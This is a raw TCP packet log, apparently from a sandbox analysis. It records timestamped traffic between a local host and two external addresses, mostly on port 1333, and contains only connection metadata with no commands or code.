Sep 28, 2023 06:02:00.484178066 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484211922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484220982 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484256983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484272957 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484318018 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484319925 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484355927 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484365940 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484375000 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484402895 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484421968 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484457970 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484476089 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484504938 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484535933 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484563112 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484585047 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484611988 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484636068 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484647989 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484692097 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484776020 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484822035 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484839916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484858036 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484884977 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484915972 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484926939 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484971046 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484973907 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.485008001 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.485018969 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.485050917 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.485054970 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.485096931 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.485147953 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.485193968 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.485197067 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.485234976 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.547869921 CEST	80	49817	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:00.548330069 CEST	49817	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:00.548330069 CEST	49817	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:00.562643051 CEST	80	49816	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:00.563095093 CEST	49816	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:00.609970093 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610035896 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610073090 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610109091 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610150099 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610282898 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610296965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610296965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610296965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610296965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610296965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610322952 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610361099 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610378027 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610378027 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610399961 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610414982 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610466957 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610549927 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610589027 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610610962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610625982 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610635042 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610666037 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610682011 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610703945 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610726118 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610742092 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610758066 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610796928 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610848904 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610898018 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610920906 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.610969067 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.610991001 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611040115 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611068010 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611103058 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611114979 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611145973 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611160994 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611192942 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611207008 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611238003 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611253977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611300945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611354113 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611398935 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611514091 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611556053 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611576080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611610889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611619949 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611629963 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611654043 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611670017 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611690044 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611707926 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611733913 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611748934 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611779928 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611797094 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611824036 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611829042 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611843109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611875057 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611893892 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611912012 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.611938953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611953020 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.611985922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612030983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612050056 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612071037 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612096071 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612112999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612126112 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612173080 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612176895 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612221003 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612268925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612313986 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612328053 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612373114 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612405062 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612438917 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612452984 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612483025 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612555027 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612601042 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612673998 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612692118 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612718105 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612734079 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612750053 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612796068 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612797976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612831116 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612843037 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612878084 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612907887 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612942934 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.612953901 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612986088 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.612998009 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613042116 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613074064 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613106966 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613118887 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613151073 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613162994 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613208055 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613254070 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613297939 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613389969 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613408089 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613434076 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613446951 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613446951 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613467932 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613487005 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613493919 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613504887 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613527060 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613564014 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613609076 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613619089 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613651991 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613663912 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613696098 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613708019 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613753080 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613781929 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613827944 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613841057 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613873959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613886118 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613918066 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613924980 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.613969088 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.613991976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614025116 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614037991 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614070892 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614130020 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614180088 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614202023 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614237070 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614248991 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614278078 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614281893 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614300966 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614324093 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614336967 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614339113 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614382982 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614386082 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614419937 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614428997 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614465952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614478111 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614521980 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614554882 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614600897 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614687920 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614733934 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614763021 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614804983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614830971 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614875078 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.614919901 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.614964962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615010977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615056992 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615070105 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615113974 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615123987 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615168095 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615214109 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615258932 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615284920 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615329027 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615359068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615401030 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615402937 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615443945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615453959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615499020 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615529060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615562916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615572929 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615582943 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615606070 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615621090 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615712881 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615731001 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615756989 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615767956 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615773916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615817070 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615847111 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615894079 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615923882 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615942001 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.615968943 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.615984917 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616017103 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616060972 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616080046 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616122961 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616153002 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616200924 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616230965 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616265059 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616275072 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616283894 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616307020 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616318941 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616321087 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616362095 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616367102 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616410971 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616446018 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616463900 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616489887 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616503954 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616595030 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616621017 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616648912 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616663933 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616679907 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616723061 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616728067 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616746902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616771936 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616779089 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.616786003 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.616822958 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.664278030 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.664329052 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.664355040 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.664366007 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.664375067 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.664406061 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.664442062 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.664479017 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.664556980 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.664556980 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.664556980 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.664556980 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.739231110 CEST	80	49817	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:00.742854118 CEST	80	49817	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:00.743197918 CEST	49817	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:00.791903019 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792010069 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792032003 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792052984 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792088032 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792126894 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792161942 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792198896 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792237043 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792270899 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792306900 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792340994 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792365074 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792365074 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792365074 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792365074 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792375088 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792365074 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792366028 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792366028 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792366028 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792417049 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792445898 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792447090 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792455912 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792469978 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792495966 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792505026 CEST	49810	1333	192.168.2.3	116.202.2.169
